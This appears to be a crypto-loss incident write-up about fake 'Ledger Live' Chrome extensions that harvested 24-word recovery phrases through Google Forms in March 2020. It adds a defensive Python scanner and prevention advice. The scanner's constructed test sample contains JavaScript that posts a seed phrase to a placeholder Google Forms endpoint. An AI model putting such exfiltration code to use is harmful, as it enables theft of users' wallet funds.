$2 500 000 USD

MARCH 2020

GLOBAL

LEDGER

DESCRIPTION OF EVENTS

"Based in France, Ledger is the largest cryptocurrency hardware wallet company." "Ledger is a hardware cryptocurrency wallet that is used to store, manage, and sell cryptocurrency. The funds held in these wallets are secured using a 24-word recovery phrase and an optional secret passphrase that only the owner knows."

 

"Ledger offers two products, the Nano S and Nano X, that can store the digital keys used to secure crypto wallets. The devices can be used with a variety of cryptocurrencies, are compatible with numerous apps, and are supposed to offer a safe way to manage crypto without compromising too much on convenience. Ledger says on its website that it has sold 1.5 million products to customers in 165 countries to date."

 

"Online scammers have been targeting other popular crypto companies to impersonate their apps on Google and steal money from users." "The extensions he discovered impersonated well-known crypto firms such as Ledger, KeepKey, MetaMask and Jaxx. Their purpose is to trick users into giving away the credentials needed to access their wallets." "In early March, leading cryptocurrency hardware-wallet producer Ledger warned its users about the phishing extensions on the store."

 

"Ledger’s Twitter account warned users of fraudulent Chrome Extensions on March 5." "[A]ccording to Denley, the extension is also heavily advertised via Google ads for the keywords "Ledger Live," the Ledger service it's trying to impersonate."

 

"Leannekera said that sick, and in the isolation of quarantine, she made the decision to consolidate her Cryptocurrencies into Bitcoin as “money is tight,” and she believed that the consolidation would “recoup around 20%” of her and her husband’s losses."

 

"I’m self-isolated as I am one of the many victims of Covid-19. I’m confined to a room in our house while my husband, who is a key worker, continues to leave for work each day during the UK’s first lockdown. He’s an absolute hero, but I desperately wish our circumstances were different. I desperately wish I could just hug him."

 

"I have little but a laptop to keep me sane during the day at the minute, so I am frequenting Reddit often and keeping an eye on the crypto markets. Due to the situation right now money is tight, however I had worked out that by consolidating a few of our other crypto I would be able to recoup around 20% of our losses to help."

 

"A fake Chrome extension has been found, asking you to enter your 24-word recovery phrase."

 

“I recalled the Ledger having a Chrome extension and this is when the scam starts,” she wrote.

 

"The scam was particularly malicious because of steps that hackers may have taken to make it appear to be legitimate: “the only ledger extension on the Chrome store is one by the name of ‘Ledger Wallet’ or ‘Ledger Live,’” she wrote."

 

“It claims to be from Ledger.com ® or Ledger Official ® and for all intents and purposes looks legitimate. It even had over 70 positive 4-5 star reviews, ranging from ‘Its a little difficult to operate’ to ‘once I understood what to do it was easy.’”

 

"However, the extension then prompted her to enter her wallets’ proprietary seed phrase, which allowed the hackers to take ownership of its private keys and send the XRP to their own wallet."

 

“The entire process took less than 8 minutes,” she said.

 

"In [a] post, which was made on March 28, Reddit user ‘Leannekera,’ who also claims to be infected with the coronavirus, wrote that she felt “so embarrassed” after she “watched our xrp transfer from our account to an account that is currently holding over $2.5 million in xrp.”"

 

"“This is clearly a large operation,” she wrote."

 

"Fake “Ledger Live” chrome extensions are used to collect user backup passphrases. They are advertised in Google searches and use Google Docs for collecting data. Accounts are being emptied and we have seen more than 200K XRP being stolen the past month alone."

 

"Since Ledger hardware wallets are used to manage more than 20 types of cryptocurrency accounts, a hacker who manages to steal a Ledger seed phrase could gain access to large amounts of cryptocurrency."

 

"A fraudulent cryptocurrency wallet masquerading as legitimate Google Chrome extensions may be responsible for a scam operation that may have claimed as much as $2.5 million in XRP, according to a report from a Reddit user who claims to have lost roughly $2,500 in XRP to the scam extension over the weekend."

 

"I have since reset the Ledger, filed a report with Ripple, the FBI and my local Fraud Police. My husband has been ridiculously understanding. He says it's just money and right now our focus should be on getting better / staying safe. I feel devastated."

 

"While the exact Chrome Extension she allegedly used is no longer online, Leannekera said that she had “seen it re-uploaded this morning” at the time of the post. Both of the links that she supplied to the alleged scam wallets were dead ends, seeming to indicate that they had been removed from the Chrome Web Store."

 

"However, searching the web store revealed that there is a Ledger Wallet extension still live on the platform, and there are a number of reviews that say that it is a scam."

A number of malicious Google Chrome extensions appeared in March 2020 claiming to be the official Ledger Live wallet. They were pushed to victims through Google search advertisements bought against the keyword "Ledger Live", so they surfaced above the genuine product, and they carried dozens of positive reviews to look established. During the supposed wallet setup the extension asked the user to type in their 24-word recovery phrase, which was submitted to the attacker through a Google Form. Because the recovery phrase regenerates every private key the hardware wallet protects, whoever holds it can sign transactions for every coin on the device without ever touching the device itself, and the stolen funds were moved within minutes. One victim reported losing roughly $2,500 in XRP to an address that was holding over $2.5 million in XRP at the time, and Ledger's support account reported more than 200K XRP stolen in the preceding month alone; the operation's total take, in XRP or any other coin, is not known.
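As an added illustration of the pattern just described (this is example code written for this page, not tooling from Ledger, Google or any of the cited sources), the following Python script scans the unpacked files of a Chrome extension and flags the combination that characterised this campaign: a recovery-phrase prompt together with a Google Forms submission endpoint, or a recovery-phrase prompt under a hardware-wallet brand name at all, since hardware-wallet companion software never asks for the seed on the host computer. The indicator regexes, the risk rules and the three sample extensions (including the `FORM_ID` placeholder in the fake one) are constructed assumptions for the demonstration, not a vendor signature set.

```python
"""Heuristic scan of an unpacked Chrome extension for the seed-phrase phishing
pattern: a page that asks for a 12- or 24-word recovery phrase and submits it to
a third-party form collector (Google Forms in the March 2020 campaign).
Added example; not Ledger's, Google's or any cited source's tooling. The
indicator lists, risk rules and sample extensions are constructed assumptions."""
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Companion software for hardware wallets never asks for the recovery phrase on
# the host computer, so a seed prompt under one of these names is itself a red flag.
HARDWARE_WALLET_BRANDS = ("ledger", "trezor", "keepkey")

# Wording a seed-phrase prompt typically uses (assumed indicator list).
SEED_PROMPT_RE = re.compile(
    r"\b(12|24)[ -]?words?\b|recovery\s+(phrase|seed)|seed\s+phrase"
    r"|backup\s+passphrase|\bmnemonic\b",
    re.IGNORECASE,
)
# Form collectors: Google Forms submission URLs (docs.google.com/forms/.../formResponse).
FORM_COLLECTOR_RE = re.compile(r"docs\.google\.com/forms|/formResponse\b", re.IGNORECASE)
# Any outbound send from page script; the destination must then be reviewed by hand.
NETWORK_SEND_RE = re.compile(
    r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|\$\.(?:post|ajax)\s*\(",
    re.IGNORECASE,
)


@dataclass
class Verdict:
    name: str
    brand: Optional[str]
    seed_prompt: bool
    form_collector: bool
    network_send: bool
    risk: str                      # "high", "medium" or "low"
    reasons: List[str] = field(default_factory=list)


def brand_in_name(name: str) -> Optional[str]:
    """Return the hardware-wallet brand the extension name trades on, if any."""
    lowered = name.lower()
    return next((b for b in HARDWARE_WALLET_BRANDS if b in lowered), None)


def scan_extension(files: Dict[str, str]) -> Verdict:
    """files maps path -> content for manifest.json plus the extension's HTML/JS."""
    manifest = json.loads(files.get("manifest.json", "{}"))
    name = manifest.get("name", "")
    brand = brand_in_name(name)
    code = [text for path, text in files.items() if path != "manifest.json"]

    seed = any(SEED_PROMPT_RE.search(t) for t in code)
    form = any(FORM_COLLECTOR_RE.search(t) for t in code)
    net = any(NETWORK_SEND_RE.search(t) for t in code)

    reasons: List[str] = []
    risk = "low"
    if seed and brand is not None:
        risk = "high"
        reasons.append(f"asks for a recovery phrase while posing as {brand} software")
    if seed and form:
        risk = "high"
        reasons.append("recovery-phrase prompt plus a third-party form collector endpoint")
    elif seed and net and risk == "low":
        # Software wallets legitimately import seeds, so a plain outbound send
        # only warrants manual review of where the data goes.
        risk = "medium"
        reasons.append("recovery-phrase prompt plus an outbound send; review the destination")
    return Verdict(name, brand, seed, form, net, risk, reasons)


# Constructed sample: the fake "Ledger Live" extension pattern from the write-up.
FAKE_LEDGER_LIVE = {
    "manifest.json": json.dumps({"name": "Ledger Live", "version": "1.0",
                                 "manifest_version": 2,
                                 "permissions": ["https://*/*"]}),
    "popup.html": "<h2>Restore your Ledger</h2>"
                  "<p>Enter your 24 word recovery phrase</p>"
                  "<textarea id='seed'></textarea><button id='go'>Continue</button>",
    "popup.js": "document.getElementById('go').onclick = () => {"
                " const body = new FormData(); body.append('entry.1', seed.value);"
                " fetch('https://docs.google.com/forms/d/e/FORM_ID/formResponse',"
                " {method: 'POST', body}); };",
}

# Constructed sample: a software wallet with a normal import flow and its own RPC.
SOFTWARE_WALLET_IMPORT = {
    "manifest.json": json.dumps({"name": "Example Software Wallet", "version": "2.3",
                                 "manifest_version": 2}),
    "import.html": "<p>Import an existing wallet: paste your seed phrase</p>",
    "wallet.js": "fetch('https://rpc.example.invalid/', {method: 'POST', body: tx});",
}

# Constructed sample: unrelated extension with no wallet wording at all.
BENIGN = {
    "manifest.json": json.dumps({"name": "Tab Counter", "version": "0.1",
                                 "manifest_version": 2}),
    "popup.js": "chrome.tabs.query({}, tabs => console.log(tabs.length));",
}

if __name__ == "__main__":
    for sample in (FAKE_LEDGER_LIVE, SOFTWARE_WALLET_IMPORT, BENIGN):
        v = scan_extension(sample)
        print(f"{v.name!r}: risk={v.risk} reasons={v.reasons}")
```

The rules deliberately separate the two brand classes: a seed prompt in a software wallet is a normal import flow and only earns a review, whereas a seed prompt under a Ledger, Trezor or KeepKey name is flagged outright because their genuine software never needs it on the host. To scan a real installation, read the files from the browser's extension directory into the same path-to-content mapping and call `scan_extension` on each.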

HOW COULD THIS HAVE BEEN PREVENTED?

Always reach a service through its official website typed in directly, never through a search advertisement or a store listing found by keyword, and install wallet software only from the download links published there. A hardware wallet's 24-word recovery phrase belongs only on the device itself: no genuine Ledger Live application, browser extension, website or support agent will ever ask for it, so any prompt to type it into a computer should be treated as theft in progress, whatever reviews or branding surround it. Keep the majority of funds offline in cold storage rather than in a live wallet application. When setting up a new wallet or upgrading wallet software, verify it with a small transfer before moving larger amounts.

 


Sources And Further Reading

@Cointelegraph Twitter (Feb 25)
Trezor crypto wallet warns users of doppelgänger scam app on Google Play (Feb 25)
22 More Crypto-Stealing Google Chrome Extensions Discovered (Mar 2)
More crypto-stealing Chrome extensions swatted by Google – Naked Security (Mar 2)
@danfinlay Twitter (Mar 2)
Fake Ledger Chrome Extension Crypto Scam May Have Stolen Up to $2.5M | Finance Magnates (Mar 7)
@Ledger_Support Twitter (Mar 7)
@xrpforensics Twitter (Mar 7)
Reddit - Dive into anything (Mar 7)
Fake Ledger Chrome Extensions Continue to Steal Crypto From Victims (Mar 7)
Fraudulent Ledger Chrome Scam May Have Stolen up to $2.5 Million in Crypto | Cryptoglobe (Mar 7)
Fake Ledger Chrome extension continues to steal millions of XRP from crypto users - TokenPost (Mar 7)
Reddit - Dive into anything (Mar 7)
Malicious Chrome extension caught stealing Ledger wallet recovery seeds | ZDNet (Mar 7)
@sniko_ Twitter (Mar 7)
Nasty Ledger wallet scams. And how to avoid them. - Who Took My Crypto (Mar 20)
Ledger Wallet Warns of Fake Google Chrome Extension Stealing Crypto (Jul 2)
Metamask got hacked - Moralis Academy Forum (Aug 22)
Discovering Fake Browser Extensions That Target Users Of Ledger Trezor Mew Metamask And More (Aug 22)
Fake Chrome extension steals crypto from users, warns Ledger Wallet | Invezz (Aug 22)
The Dangers Of Malicious Browser Extensions (Aug 22)
My money from my ethereum account were stolen after I acceded the account via MEW CX extension. - Google Chrome Community (Aug 22)
Downloaded new KeepKep Client, my funds were stolen 10 Minutes Later... Who do I vengefully hunt down?! : keepkey (Aug 22)


© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.